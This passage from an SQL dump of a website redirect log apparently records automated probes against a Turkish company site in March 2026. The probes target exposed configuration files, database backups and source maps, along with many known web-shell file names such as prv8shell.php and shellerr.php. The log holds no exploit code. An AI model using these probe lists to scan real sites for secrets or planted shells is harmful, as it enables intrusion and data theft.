22:27:22','0000-00-00 00:00:00',301),(59571,'https://3s-technologies.com.tr/tr/scripts.js.map',NULL,'https://3s-technologies.com.tr/scripts.js.map','',1,0,'2026-03-14 22:27:22','0000-00-00 00:00:00',301),(59572,'https://3s-technologies.com.tr/en/settings.php',NULL,'https://3s-technologies.com.tr/settings.php','',1,0,'2026-03-14 22:27:23','0000-00-00 00:00:00',301),(59573,'https://3s-technologies.com.tr/tr/js/app.js.map',NULL,'https://3s-technologies.com.tr/js/app.js.map','',1,0,'2026-03-14 22:27:23','0000-00-00 00:00:00',301),(59574,'https://3s-technologies.com.tr/en/settings.json',NULL,'https://3s-technologies.com.tr/settings.json','',3,0,'2026-03-14 22:27:23','0000-00-00 00:00:00',301),(59575,'https://3s-technologies.com.tr/tr/js/chunk-vendors.js.map',NULL,'https://3s-technologies.com.tr/js/chunk-vendors.js.map','',1,0,'2026-03-14 22:27:24','0000-00-00 00:00:00',301),(59576,'https://3s-technologies.com.tr/en/app/config/parameters.yml',NULL,'https://3s-technologies.com.tr/app/config/parameters.yml','',1,0,'2026-03-14 22:27:24','0000-00-00 00:00:00',301),(59577,'https://3s-technologies.com.tr/tr/js/about.js.map',NULL,'https://3s-technologies.com.tr/js/about.js.map','',1,0,'2026-03-14 22:27:25','0000-00-00 00:00:00',301),(59578,'https://3s-technologies.com.tr/en/config/database.yml',NULL,'https://3s-technologies.com.tr/config/database.yml','',1,0,'2026-03-14 22:27:25','0000-00-00 00:00:00',301),(59579,'https://3s-technologies.com.tr/tr/static/js/main.js.map',NULL,'https://3s-technologies.com.tr/static/js/main.js.map','',1,0,'2026-03-14 22:27:25','0000-00-00 00:00:00',301),(59580,'https://3s-technologies.com.tr/tr/static/js/bundle.js.map',NULL,'https://3s-technologies.com.tr/static/js/bundle.js.map','',1,0,'2026-03-14 22:27:26','0000-00-00 00:00:00',301),(59581,'https://3s-technologies.com.tr/tr/static/js/vendors~main.js.map',NULL,'https://3s-technologies.com.tr/static/js/vendors~main.js.map','',1,0,'2026-03-14 22:27:27','0000-00-00 00:00:00',301),(59582,'https://3s-technologies.com.tr/tr/assets/index.js.map',NULL,'https://3s-technologies.com.tr/assets/index.js.map','',1,0,'2026-03-14 22:27:28','0000-00-00 00:00:00',301),(59583,'https://3s-technologies.com.tr/en/wp-config.php.save',NULL,'https://3s-technologies.com.tr/wp-config.php.save','',1,0,'2026-03-14 22:27:28','0000-00-00 00:00:00',301),(59584,'https://3s-technologies.com.tr/tr/assets/vendor.js.map',NULL,'https://3s-technologies.com.tr/assets/vendor.js.map','',1,0,'2026-03-14 22:27:29','0000-00-00 00:00:00',301),(59585,'https://3s-technologies.com.tr/en/wp-config.php.txt',NULL,'https://3s-technologies.com.tr/wp-config.php.txt','',1,0,'2026-03-14 22:27:29','0000-00-00 00:00:00',301),(59586,'https://3s-technologies.com.tr/tr/dist/bundle.js.map',NULL,'https://3s-technologies.com.tr/dist/bundle.js.map','',1,0,'2026-03-14 22:27:29','0000-00-00 00:00:00',301),(59587,'https://3s-technologies.com.tr/en/wp-config.php~',NULL,'https://3s-technologies.com.tr/wp-config.php~','',1,0,'2026-03-14 22:27:30','0000-00-00 00:00:00',301),(59588,'https://3s-technologies.com.tr/tr/dist/main.js.map',NULL,'https://3s-technologies.com.tr/dist/main.js.map','',1,0,'2026-03-14 22:27:30','0000-00-00 00:00:00',301),(59589,'https://3s-technologies.com.tr/en/storage/logs/laravel.log',NULL,'https://3s-technologies.com.tr/storage/logs/laravel.log','',5,0,'2026-03-14 22:27:30','0000-00-00 00:00:00',301),(59590,'https://3s-technologies.com.tr/tr/build/bundle.js.map',NULL,'https://3s-technologies.com.tr/build/bundle.js.map','',1,0,'2026-03-14 22:27:31','0000-00-00 00:00:00',301),(59591,'https://3s-technologies.com.tr/en/config/app.php',NULL,'https://3s-technologies.com.tr/config/app.php','',1,0,'2026-03-14 22:27:31','0000-00-00 00:00:00',301),(59592,'https://3s-technologies.com.tr/tr/build/static/js/main.js.map',NULL,'https://3s-technologies.com.tr/build/static/js/main.js.map','',1,0,'2026-03-14 22:27:31','0000-00-00 00:00:00',301),(59593,'https://3s-technologies.com.tr/en/config/database.php',NULL,'https://3s-technologies.com.tr/config/database.php','',1,0,'2026-03-14 22:27:32','0000-00-00 00:00:00',301),(59594,'https://3s-technologies.com.tr/en/config/mail.php',NULL,'https://3s-technologies.com.tr/config/mail.php','',1,0,'2026-03-14 22:27:32','0000-00-00 00:00:00',301),(59595,'https://3s-technologies.com.tr/en/api/config',NULL,'https://3s-technologies.com.tr/api/config','',4,0,'2026-03-14 22:27:33','0000-00-00 00:00:00',301),(59596,'https://3s-technologies.com.tr/en/api/v1/config',NULL,'https://3s-technologies.com.tr/api/v1/config','',2,0,'2026-03-14 22:27:34','0000-00-00 00:00:00',301),(59597,'https://3s-technologies.com.tr/en/swagger.json',NULL,'https://3s-technologies.com.tr/swagger.json','',2,0,'2026-03-14 22:27:34','0000-00-00 00:00:00',301),(59598,'https://3s-technologies.com.tr/en/swagger.yaml',NULL,'https://3s-technologies.com.tr/swagger.yaml','',1,0,'2026-03-14 22:27:35','0000-00-00 00:00:00',301),(59599,'https://3s-technologies.com.tr/en/api-docs',NULL,'https://3s-technologies.com.tr/api-docs','',1,0,'2026-03-14 22:27:35','0000-00-00 00:00:00',301),(59600,'https://3s-technologies.com.tr/en/graphql',NULL,'https://3s-technologies.com.tr/graphql','',1,0,'2026-03-14 22:27:36','0000-00-00 00:00:00',301),(59601,'https://3s-technologies.com.tr/en/graphiql',NULL,'https://3s-technologies.com.tr/graphiql','',1,0,'2026-03-14 22:27:36','0000-00-00 00:00:00',301),(59602,'https://3s-technologies.com.tr/en/playground',NULL,'https://3s-technologies.com.tr/playground','',1,0,'2026-03-14 22:27:37','0000-00-00 00:00:00',301),(59603,'https://3s-technologies.com.tr/en/altair',NULL,'https://3s-technologies.com.tr/altair','',1,0,'2026-03-14 22:27:37','0000-00-00 00:00:00',301),(59604,'https://3s-technologies.com.tr/en/api/graphql',NULL,'https://3s-technologies.com.tr/api/graphql','',1,0,'2026-03-14 22:27:38','0000-00-00 00:00:00',301),(59605,'https://3s-technologies.com.tr/en/v1/graphql',NULL,'https://3s-technologies.com.tr/v1/graphql','',3,0,'2026-03-14 22:27:38','0000-00-00 00:00:00',301),(59606,'https://3s-technologies.com.tr/en/graphql/console',NULL,'https://3s-technologies.com.tr/graphql/console','',1,0,'2026-03-14 22:27:39','0000-00-00 00:00:00',301),(59607,'https://3s-technologies.com.tr/en/backup.sql',NULL,'https://3s-technologies.com.tr/backup.sql','',1,0,'2026-03-14 22:27:39','0000-00-00 00:00:00',301),(59608,'https://3s-technologies.com.tr/en/backup.zip',NULL,'https://3s-technologies.com.tr/backup.zip','',1,0,'2026-03-14 22:27:40','0000-00-00 00:00:00',301),(59609,'https://3s-technologies.com.tr/en/dump.sql',NULL,'https://3s-technologies.com.tr/dump.sql','',1,0,'2026-03-14 22:27:40','0000-00-00 00:00:00',301),(59610,'https://3s-technologies.com.tr/en/db.sql',NULL,'https://3s-technologies.com.tr/db.sql','',1,0,'2026-03-14 22:27:41','0000-00-00 00:00:00',301),(59611,'https://3s-technologies.com.tr/en/database.sql',NULL,'https://3s-technologies.com.tr/database.sql','',1,0,'2026-03-14 22:27:41','0000-00-00 00:00:00',301),(59612,'https://3s-technologies.com.tr/en/data.sql',NULL,'https://3s-technologies.com.tr/data.sql','',1,0,'2026-03-14 22:27:42','0000-00-00 00:00:00',301),(59613,'https://3s-technologies.com.tr/en/debug',NULL,'https://3s-technologies.com.tr/debug','',1,0,'2026-03-14 22:27:43','0000-00-00 00:00:00',301),(59614,'https://3s-technologies.com.tr/en/docker-compose.yml',NULL,'https://3s-technologies.com.tr/docker-compose.yml','',1,0,'2026-03-14 22:27:45','0000-00-00 00:00:00',301),(59615,'http://mail.3s-technologies.com.tr/tr/ox.php',NULL,'','',3,0,'2026-03-14 22:45:46','0000-00-00 00:00:00',301),(59616,'http://mail.3s-technologies.com.tr/tr/1754569357_be.php',NULL,'','',1,0,'2026-03-14 22:45:47','0000-00-00 00:00:00',301),(59617,'http://mail.3s-technologies.com.tr/tr/wp-kd4xalrg7m.php',NULL,'','',7,0,'2026-03-14 22:45:48','0000-00-00 00:00:00',301),(59618,'http://mail.3s-technologies.com.tr/tr/boltt.php',NULL,'','',1,0,'2026-03-14 22:45:50','0000-00-00 00:00:00',301),(59619,'http://mail.3s-technologies.com.tr/tr/prv8shell.php',NULL,'','',1,0,'2026-03-14 22:45:50','0000-00-00 00:00:00',301),(59620,'http://mail.3s-technologies.com.tr/tr/sc_1.php',NULL,'','',1,0,'2026-03-14 22:45:52','0000-00-00 00:00:00',301),(59621,'http://mail.3s-technologies.com.tr/tr/1998.php',NULL,'','',1,0,'2026-03-14 22:45:52','0000-00-00 00:00:00',301),(59622,'http://mail.3s-technologies.com.tr/tr/wtiiy.php',NULL,'','',20,0,'2026-03-14 22:45:53','0000-00-00 00:00:00',301),(59623,'http://mail.3s-technologies.com.tr/tr/wp-mter.php',NULL,'','',5,0,'2026-03-14 22:45:54','0000-00-00 00:00:00',301),(59624,'http://mail.3s-technologies.com.tr/tr/hc.php',NULL,'','',1,0,'2026-03-14 22:45:55','0000-00-00 00:00:00',301),(59625,'http://mail.3s-technologies.com.tr/tr/0771dccd2958b85d48125d146d77e038akc.php',NULL,'','',1,0,'2026-03-14 22:45:58','0000-00-00 00:00:00',301),(59626,'http://mail.3s-technologies.com.tr/tr/we-es-o.php',NULL,'','',1,0,'2026-03-14 22:45:59','0000-00-00 00:00:00',301),(59627,'http://mail.3s-technologies.com.tr/tr/h2.php',NULL,'','',9,0,'2026-03-14 22:46:00','0000-00-00 00:00:00',301),(59628,'http://mail.3s-technologies.com.tr/tr/wp11.php',NULL,'','',1,0,'2026-03-14 22:46:01','0000-00-00 00:00:00',301),(59629,'http://mail.3s-technologies.com.tr/tr/file61.php',NULL,'','',27,0,'2026-03-14 22:46:01','0000-00-00 00:00:00',301),(59630,'http://mail.3s-technologies.com.tr/tr/cash.php',NULL,'','',1,0,'2026-03-14 22:46:04','0000-00-00 00:00:00',301),(59631,'https://3s-technologies.com.tr/en//modules/mod_djimageslider/themes/default/images/play.png',NULL,'','',1,0,'2026-03-15 01:01:05','0000-00-00 00:00:00',301),(59632,'https://3s-technologies.com.tr/en//modules/mod_djimageslider/themes/default/images/prev.png',NULL,'','',1,0,'2026-03-15 01:01:06','0000-00-00 00:00:00',301),(59633,'https://3s-technologies.com.tr/en//modules/mod_djimageslider/themes/default/images/next.png',NULL,'','',1,0,'2026-03-15 01:01:06','0000-00-00 00:00:00',301),(59634,'https://3s-technologies.com.tr/en//modules/mod_djimageslider/themes/default/images/pause.png',NULL,'','',1,0,'2026-03-15 01:01:07','0000-00-00 00:00:00',301),(59635,'https://3s-technologies.com.tr/en/srpihtzg',NULL,'','',2,0,'2026-03-15 01:48:27','0000-00-00 00:00:00',301),(59636,'http://3s-technologies.com.tr/en/czvlmsoa',NULL,'','',2,0,'2026-03-15 01:48:28','0000-00-00 00:00:00',301),(59637,'https://3s-technologies.com.tr/tr/tr.tar',NULL,'','',1,0,'2026-03-15 01:51:07','0000-00-00 00:00:00',301),(59638,'https://3s-technologies.com.tr/tr/tr.tar.gz',NULL,'','',1,0,'2026-03-15 01:51:08','0000-00-00 00:00:00',301),(59639,'http://3s-technologies.com.tr/en/midfmjig.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-03-15 09:22:12','0000-00-00 00:00:00',301),(59640,'https://3s-technologies.com.tr/en/oogzabrm.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-03-15 09:22:13','0000-00-00 00:00:00',301),(59641,'http://3s-technologies.com.tr/en/images/global/lfs1photo.gif',NULL,'http://3s-technologies.com.tr/','',3,0,'2026-03-15 13:49:18','0000-00-00 00:00:00',301),(59642,'http://mail.3s-technologies.com.tr/tr/cgi-bin',NULL,'','',3,0,'2026-03-16 15:05:37','0000-00-00 00:00:00',301),(59643,'https://3s-technologies.com.tr/en/wp-admin/admin-ajax.php',NULL,'','',3,0,'2026-03-16 15:10:46','0000-00-00 00:00:00',301),(59644,'https://3s-technologies.com.tr/en/wp-admin/load-scripts.php',NULL,'','',3,0,'2026-03-16 15:10:46','0000-00-00 00:00:00',301),(59645,'https://3s-technologies.com.tr/en/wp-admin/load-styles.php',NULL,'','',3,0,'2026-03-16 15:10:47','0000-00-00 00:00:00',301),(59646,'https://3s-technologies.com.tr/en/wp-includes/js/jquery/jquery.js',NULL,'','',3,0,'2026-03-16 15:10:48','0000-00-00 00:00:00',301),(59647,'https://3s-technologies.com.tr/en/wp-includes/css/dashicons.css',NULL,'','',3,0,'2026-03-16 15:10:49','0000-00-00 00:00:00',301),(59648,'https://3s-technologies.com.tr/en/wp-content/themes',NULL,'','',3,0,'2026-03-16 15:10:49','0000-00-00 00:00:00',301),(59649,'https://3s-technologies.com.tr/en/wp-content/plugins',NULL,'','',3,0,'2026-03-16 15:10:50','0000-00-00 00:00:00',301),(59650,'https://3s-technologies.com.tr/en/wp-includes/version.php',NULL,'','',3,0,'2026-03-16 15:10:51','0000-00-00 00:00:00',301),(59651,'https://3s-technologies.com.tr/en/wp-includes/functions.php',NULL,'','',3,0,'2026-03-16 15:10:52','0000-00-00 00:00:00',301),(59652,'https://3s-technologies.com.tr/en/wp-includes/class-wp.php',NULL,'','',3,0,'2026-03-16 15:10:53','0000-00-00 00:00:00',301),(59653,'https://3s-technologies.com.tr/en/wp-includes/option.php',NULL,'','',3,0,'2026-03-16 15:10:54','0000-00-00 00:00:00',301),(59654,'https://3s-technologies.com.tr/en/wp-includes/post.php',NULL,'','',3,0,'2026-03-16 15:10:54','0000-00-00 00:00:00',301),(59655,'https://3s-technologies.com.tr/en/wp-includes/user.php',NULL,'','',3,0,'2026-03-16 15:10:55','0000-00-00 00:00:00',301),(59656,'https://3s-technologies.com.tr/en/wp-json/oembed/1.0/embed',NULL,'','',3,0,'2026-03-16 15:10:58','0000-00-00 00:00:00',301),(59657,'https://3s-technologies.com.tr/en/wp-json/wp/v2/posts',NULL,'','',4,0,'2026-03-16 15:10:59','0000-00-00 00:00:00',301),(59658,'https://3s-technologies.com.tr/en/wp-json/wp/v2/pages',NULL,'','',3,0,'2026-03-16 15:11:00','0000-00-00 00:00:00',301),(59659,'https://3s-technologies.com.tr/en/wp-json/wp/v2/media',NULL,'','',3,0,'2026-03-16 15:11:01','0000-00-00 00:00:00',301),(59660,'https://3s-technologies.com.tr/en/wp-json/wp/v2/categories',NULL,'','',3,0,'2026-03-16 15:11:01','0000-00-00 00:00:00',301),(59661,'https://3s-technologies.com.tr/en/wp-json/wp/v2/tags',NULL,'','',3,0,'2026-03-16 15:11:02','0000-00-00 00:00:00',301),(59662,'https://3s-technologies.com.tr/en/wp-content/uploads',NULL,'','',3,0,'2026-03-16 15:11:03','0000-00-00 00:00:00',301),(59663,'https://3s-technologies.com.tr/en/wp-content/themes/twentytwenty',NULL,'','',3,0,'2026-03-16 15:11:04','0000-00-00 00:00:00',301),(59664,'https://3s-technologies.com.tr/en/wp-content/themes/twentytwentyone',NULL,'','',3,0,'2026-03-16 15:11:05','0000-00-00 00:00:00',301),(59665,'https://3s-technologies.com.tr/en/wp-content/themes/twentytwentytwo',NULL,'','',3,0,'2026-03-16 15:11:06','0000-00-00 00:00:00',301),(59666,'https://3s-technologies.com.tr/en/wp-content/themes/twentytwentythree',NULL,'','',3,0,'2026-03-16 15:11:06','0000-00-00 00:00:00',301),(59667,'https://3s-technologies.com.tr/en/wp-content/plugins/hello.php',NULL,'','',3,0,'2026-03-16 15:11:07','0000-00-00 00:00:00',301),(59668,'https://3s-technologies.com.tr/en/wp-content/plugins/akismet',NULL,'','',3,0,'2026-03-16 15:11:08','0000-00-00 00:00:00',301),(59669,'https://3s-technologies.com.tr/en/wp-includes/images/w-logo-blue.png',NULL,'','',3,0,'2026-03-16 15:11:09','0000-00-00 00:00:00',301),(59670,'https://3s-technologies.com.tr/en/feed',NULL,'','',4,0,'2026-03-16 15:11:11','0000-00-00 00:00:00',301),(59671,'https://3s-technologies.com.tr/en/feed/rss',NULL,'','',3,0,'2026-03-16 15:11:12','0000-00-00 00:00:00',301),(59672,'https://3s-technologies.com.tr/en/feed/rss2',NULL,'','',3,0,'2026-03-16 15:11:13','0000-00-00 00:00:00',301),(59673,'http://3s-technologies.com.tr/tr/nz.php',NULL,'','',13,0,'2026-03-16 22:17:37','0000-00-00 00:00:00',301),(59674,'http://3s-technologies.com.tr/tr/fwclyelxja.php',NULL,'','',1,0,'2026-03-17 07:12:57','0000-00-00 00:00:00',301),(59675,'http://3s-technologies.com.tr/tr/bywaf.php',NULL,'','',3,0,'2026-03-18 08:19:06','0000-00-00 00:00:00',301),(59676,'http://3s-technologies.com.tr/tr/feokc.php',NULL,'','',8,0,'2026-03-18 08:19:31','0000-00-00 00:00:00',301),(59677,'http://3s-technologies.com.tr/tr/wp-admin/images/acxx.php',NULL,'','',6,0,'2026-03-18 08:19:34','0000-00-00 00:00:00',301),(59678,'http://3s-technologies.com.tr/tr/ws88.php',NULL,'','',41,0,'2026-03-18 08:19:39','0000-00-00 00:00:00',301),(59679,'http://3s-technologies.com.tr/tr/ws86.php',NULL,'','',39,0,'2026-03-18 08:19:39','0000-00-00 00:00:00',301),(59680,'http://3s-technologies.com.tr/tr/h2.php',NULL,'','',18,0,'2026-03-18 08:19:40','0000-00-00 00:00:00',301),(59681,'http://3s-technologies.com.tr/tr/pas2.php',NULL,'','',3,0,'2026-03-18 08:19:55','0000-00-00 00:00:00',301),(59682,'http://3s-technologies.com.tr/tr/wtiiy.php',NULL,'','',32,0,'2026-03-18 08:19:56','0000-00-00 00:00:00',301),(59683,'http://3s-technologies.com.tr/tr/saorix1.php',NULL,'','',22,0,'2026-03-18 08:19:58','0000-00-00 00:00:00',301),(59684,'http://3s-technologies.com.tr/tr/wta.php',NULL,'','',3,0,'2026-03-18 08:19:59','0000-00-00 00:00:00',301),(59685,'http://3s-technologies.com.tr/tr/gelio1.php',NULL,'','',22,0,'2026-03-18 08:20:03','0000-00-00 00:00:00',301),(59686,'http://3s-technologies.com.tr/tr/roter.php',NULL,'','',3,0,'2026-03-18 08:20:04','0000-00-00 00:00:00',301),(59687,'http://3s-technologies.com.tr/tr/shellerr.php',NULL,'','',7,0,'2026-03-18 08:20:05','0000-00-00 00:00:00',301),(59688,'http://3s-technologies.com.tr/tr/sweg.php',NULL,'','',4,0,'2026-03-18 08:20:06','0000-00-00 00:00:00',301),(59689,'http://3s-technologies.com.tr/tr/rovoj.php',NULL,'','',3,0,'2026-03-18 08:20:08','0000-00-00 00:00:00',301),(59690,'http://3s-technologies.com.tr/tr/phpmini.php',NULL,'','',3,0,'2026-03-18 08:20:10','0000-00-00 00:00:00',301),(59691,'http://3s-technologies.com.tr/tr/caiij.php',NULL,'','',3,0,'2026-03-18 08:20:10','0000-00-00 00:00:00',301),(59692,'http://3s-technologies.com.tr/tr/admin.php/wp-includes/certificates/about.php',NULL,'','',2,0,'2026-03-18 09:01:46','0000-00-00 00:00:00',301),(59693,'http://3s-technologies.com.tr/tr/alexantr/filemanager.php',NULL,'','',2,0,'2026-03-18 09:01:47','0000-00-00 00:00:00',301),(59694,'http://3s-technologies.com.tr/tr/link.php/wp-content/plugins/wp-conflg.php',NULL,'','',2,0,'2026-03-18 09:01:48','0000-00-00 00:00:00',301),(59695,'http://3s-technologies.com.tr/tr/cong.php/wp-admin/js/index.php',NULL,'','',2,0,'2026-03-18 09:01:52','0000-00-00 00:00:00',301),(59696,'http://3s-technologies.com.tr/tr/wp-admin/css/colors.php',NULL,'','',2,0,'2026-03-18 09:01:57','0000-00-00 00:00:00',301),(59697,'http://3s-technologies.com.tr/tr/wp-ssfc.php',NULL,'','',4,0,'2026-03-19 02:28:10','0000-00-00 00:00:00',301),(59698,'http://3s-technologies.com.tr/tr/ws78.php',NULL,'','',18,0,'2026-03-19 02:28:12','0000-00-00 00:00:00',301),(59699,'http://3s-technologies.com.tr/tr/w3lls.php',NULL,'','',3,0,'2026-03-19 02:28:14','0000-00-00 00:00:00',301),(59700,'http://3s-technologies.com.tr/tr/ggb.php',NULL,'','',25,0,'2026-03-19 02:28:16','0000-00-00 00:00:00',301),(59701,'http://3s-technologies.com.tr/tr/xff.php',NULL,'','',37,0,'2026-03-19 02:28:17','0000-00-00 00:00:00',301),(59702,'http://3s-technologies.com.tr/tr/xocx.php',NULL,'','',9,0,'2026-03-20 03:42:13','0000-00-00 00:00:00',301),(59703,'http://3s-technologies.com.tr/tr/zample.php',NULL,'','',21,0,'2026-03-20 03:42:13','0000-00-00 00:00:00',301),(59704,'http://3s-technologies.com.tr/tr/mxxx.php',NULL,'','',2,0,'2026-03-20 03:42:14','0000-00-00 00:00:00',301),(59705,'http://3s-technologies.com.tr/tr/gkk.php',NULL,'','',2,0,'2026-03-20 03:42:14','0000-00-00 00:00:00',301),(59706,'http://3s-technologies.com.tr/tr/csc.php',NULL,'','',2,0,'2026-03-20 03:42:15','0000-00-00 00:00:00',301),(59707,'http://3s-technologies.com.tr/tr/about0077.php',NULL,'','',2,0,'2026-03-20 03:42:16','0000-00-00 00:00:00',301),(59708,'http://3s-technologies.com.tr/tr/read.php',NULL,'','',12,0,'2026-03-20 03:42:17','0000-00-00 00:00:00',301),(59709,'http://3s-technologies.com.tr/tr/adminblue.php',NULL,'','',1,0,'2026-03-20 03:42:17','0000-00-00 00:00:00',301),(59710,'http://3s-technologies.com.tr/tr/1754569357_be.php',NULL,'','',2,0,'2026-03-20 03:42:19','0000-00-00 00:00:00',301),(59711,'http://3s-technologies.com.tr/tr/wp-kd4xalrg7m.php',NULL,'','',17,0,'2026-03-20 03:42:20','0000-00-00 00:00:00',301),(59712,'http://3s-technologies.com.tr/tr/1998.php',NULL,'','',3,0,'2026-03-20 03:42:23','0000-00-00 00:00:00',301),(59713,'http://3s-technologies.com.tr/tr/wp-mter.php',NULL,'','',13,0,'2026-03-20 03:42:25','0000-00-00 00:00:00',301),(59714,'http://3s-technologies.com.tr/tr/hc.php',NULL,'','',2,0,'2026-03-20 03:42:26','0000-00-00 00:00:00',301),(59715,'https://3s-technologies.com.tr/en/images/images/cache.php',NULL,'','',11,0,'2026-03-20 12:13:44','0000-00-00 00:00:00',301),(59716,'http://3s-technologies.com.tr/tr/phps.php',NULL,'','',1,0,'2026-03-20 12:40:56','0000-00-00 00:00:00',301),(59717,'http://3s-technologies.com.tr/tr/caca.php',NULL,'','',1,0,'2026-03-20 12:40:56','0000-00-00 00:00:00',301),(59718,'http://3s-technologies.com.tr/tr/wp-includes/css/xm.php',NULL,'','',1,0,'2026-03-20 12:41:37','0000-00-00 00:00:00',301),(59719,'http://3s-technologies.com.tr/tr/mctnmiik.php',NULL,'','',1,0,'2026-03-20 12:41:38','0000-00-00 00:00:00',301),(59720,'http://3s-technologies.com.tr/tr/wp-includes/ms-pie.php',NULL,'','',1,0,'2026-03-20 12:41:39','0000-00-00 00:00:00',301),(59721,'http://3s-technologies.com.tr/tr/upload/image/flower.php',NULL,'','',1,0,'2026-03-20 12:41:39','0000-00-00 00:00:00',301),(59722,'http://3s-technologies.com.tr/en/joomla/en/products-en',NULL,'','',1,0,'2026-03-20 21:40:59','0000-00-00 00:00:00',301),(59723,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/buttons.css',NULL,'http://mail.3s-technologies.com.tr/wp-includes/css/buttons.css','',1,0,'2026-03-21 05:09:36','0000-00-00 00:00:00',301),(59724,'http://mail.3s-technologies.com.tr/tr/bywaf.php',NULL,'','',6,0,'2026-03-21 16:53:10','0000-00-00 00:00:00',301),(59725,'http://mail.3s-technologies.com.tr/tr/feokc.php',NULL,'','',6,0,'2026-03-21 16:53:37','0000-00-00 00:00:00',301),(59726,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/acxx.php',NULL,'','',3,0,'2026-03-21 16:53:40','0000-00-00 00:00:00',301),(59727,'http://mail.3s-technologies.com.tr/tr/ws88.php',NULL,'','',22,0,'2026-03-21 16:53:46','0000-00-00 00:00:00',301),(59728,'http://mail.3s-technologies.com.tr/tr/ws86.php',NULL,'','',27,0,'2026-03-21 16:53:46','0000-00-00 00:00:00',301),(59729,'http://mail.3s-technologies.com.tr/tr/pas2.php',NULL,'','',6,0,'2026-03-21 16:54:05','0000-00-00 00:00:00',301),(59730,'http://mail.3s-technologies.com.tr/tr/saorix1.php',NULL,'','',16,0,'2026-03-21 16:54:07','0000-00-00 00:00:00',301),(59731,'http://mail.3s-technologies.com.tr/tr/wta.php',NULL,'','',6,0,'2026-03-21 16:54:08','0000-00-00 00:00:00',301),(59732,'http://mail.3s-technologies.com.tr/tr/xper1.php',NULL,'','',17,0,'2026-03-21 16:54:11','0000-00-00 00:00:00',301),(59733,'http://mail.3s-technologies.com.tr/tr/gelio1.php',NULL,'','',16,0,'2026-03-21 16:54:12','0000-00-00 00:00:00',301),(59734,'http://mail.3s-technologies.com.tr/tr/save.php',NULL,'','',6,0,'2026-03-21 16:54:13','0000-00-00 00:00:00',301),(59735,'http://mail.3s-technologies.com.tr/tr/roter.php',NULL,'','',6,0,'2026-03-21 16:54:14','0000-00-00 00:00:00',301),(59736,'http://mail.3s-technologies.com.tr/tr/shellerr.php',NULL,'','',6,0,'2026-03-21 16:54:15','0000-00-00 00:00:00',301),(59737,'http://mail.3s-technologies.com.tr/tr/sweg.php',NULL,'','',6,0,'2026-03-21 16:54:17','0000-00-00 00:00:00',301),(59738,'http://mail.3s-technologies.com.tr/tr/phina.php',NULL,'','',6,0,'2026-03-21 16:54:17','0000-00-00 00:00:00',301),(59739,'http://mail.3s-technologies.com.tr/tr/rovoj.php',NULL,'','',6,0,'2026-03-21 16:54:19','0000-00-00 00:00:00',301),(59740,'http://mail.3s-technologies.com.tr/tr/phpmini.php',NULL,'','',6,0,'2026-03-21 16:54:20','0000-00-00 00:00:00',301),(59741,'http://mail.3s-technologies.com.tr/tr/caiij.php',NULL,'','',6,0,'2026-03-21 16:54:21','0000-00-00 00:00:00',301),(59742,'http://3s-technologies.com.tr/tr/yjoxrfglsep.php',NULL,'','',1,0,'2026-03-22 12:19:55','0000-00-00 00:00:00',301),(59743,'http://3s-technologies.com.tr/tr/fgertreyersd.php',NULL,'','',1,0,'2026-03-22 12:19:56','0000-00-00 00:00:00',301),(59744,'http://3s-technologies.com.tr/tr/config.php-eb',NULL,'','',1,0,'2026-03-22 12:20:00','0000-00-00 00:00:00',301),(59745,'http://3s-technologies.com.tr/en/joomla/tr/ana-sayfa',NULL,'','',1,0,'2026-03-22 13:06:59','0000-00-00 00:00:00',301),(59746,'http://mail.3s-technologies.com.tr/tr/wp-ssfc.php',NULL,'','',1,0,'2026-03-22 13:32:31','0000-00-00 00:00:00',301),(59747,'http://mail.3s-technologies.com.tr/tr/ws78.php',NULL,'','',13,0,'2026-03-22 13:32:32','0000-00-00 00:00:00',301),(59748,'http://mail.3s-technologies.com.tr/tr/w3lls.php',NULL,'','',1,0,'2026-03-22 13:32:34','0000-00-00 00:00:00',301),(59749,'http://mail.3s-technologies.com.tr/tr/ggb.php',NULL,'','',14,0,'2026-03-22 13:32:36','0000-00-00 00:00:00',301),(59750,'http://mail.3s-technologies.com.tr/tr/xff.php',NULL,'','',19,0,'2026-03-22 13:32:36','0000-00-00 00:00:00',301),(59751,'http://mail.3s-technologies.com.tr/tr/public/file.php',NULL,'','',7,0,'2026-03-22 13:33:49','0000-00-00 00:00:00',301),(59752,'http://www.3s-technologies.com.tr/tr/wp-ssfc.php',NULL,'','',1,0,'2026-03-22 15:11:48','0000-00-00 00:00:00',301),(59753,'http://www.3s-technologies.com.tr/tr/ws75.php',NULL,'','',1,0,'2026-03-22 15:11:49','0000-00-00 00:00:00',301),(59754,'http://www.3s-technologies.com.tr/tr/ws78.php',NULL,'','',2,0,'2026-03-22 15:11:50','0000-00-00 00:00:00',301),(59755,'http://www.3s-technologies.com.tr/tr/wp-png.php',NULL,'','',7,0,'2026-03-22 15:11:51','0000-00-00 00:00:00',301),(59756,'http://www.3s-technologies.com.tr/tr/w3lls.php',NULL,'','',1,0,'2026-03-22 15:11:52','0000-00-00 00:00:00',301),(59757,'http://www.3s-technologies.com.tr/tr/ws86.php',NULL,'','',4,0,'2026-03-22 15:11:53','0000-00-00 00:00:00',301),(59758,'http://www.3s-technologies.com.tr/tr/xwx1.php',NULL,'','',11,0,'2026-03-22 15:11:54','0000-00-00 00:00:00',301),(59759,'http://www.3s-technologies.com.tr/tr/ggb.php',NULL,'','',2,0,'2026-03-22 15:11:54','0000-00-00 00:00:00',301),(59760,'http://www.3s-technologies.com.tr/tr/xff.php',NULL,'','',3,0,'2026-03-22 15:11:55','0000-00-00 00:00:00',301),(59761,'http://www.3s-technologies.com.tr/tr/ws77.php',NULL,'','',2,0,'2026-03-22 15:11:57','0000-00-00 00:00:00',301),(59762,'http://www.3s-technologies.com.tr/tr/mh.php',NULL,'','',5,0,'2026-03-22 15:12:01','0000-00-00 00:00:00',301),(59763,'http://www.3s-technologies.com.tr/tr/ws80.php',NULL,'','',8,0,'2026-03-22 15:12:06','0000-00-00 00:00:00',301),(59764,'http://www.3s-technologies.com.tr/tr/ws88.php',NULL,'','',5,0,'2026-03-22 15:12:10','0000-00-00 00:00:00',301),(59765,'http://www.3s-technologies.com.tr/tr/ws84.php',NULL,'','',2,0,'2026-03-22 15:12:12','0000-00-00 00:00:00',301),(59766,'http://www.3s-technologies.com.tr/tr/hots.php',NULL,'','',1,0,'2026-03-22 15:12:17','0000-00-00 00:00:00',301),(59767,'http://www.3s-technologies.com.tr/tr/a5.php',NULL,'','',11,0,'2026-03-22 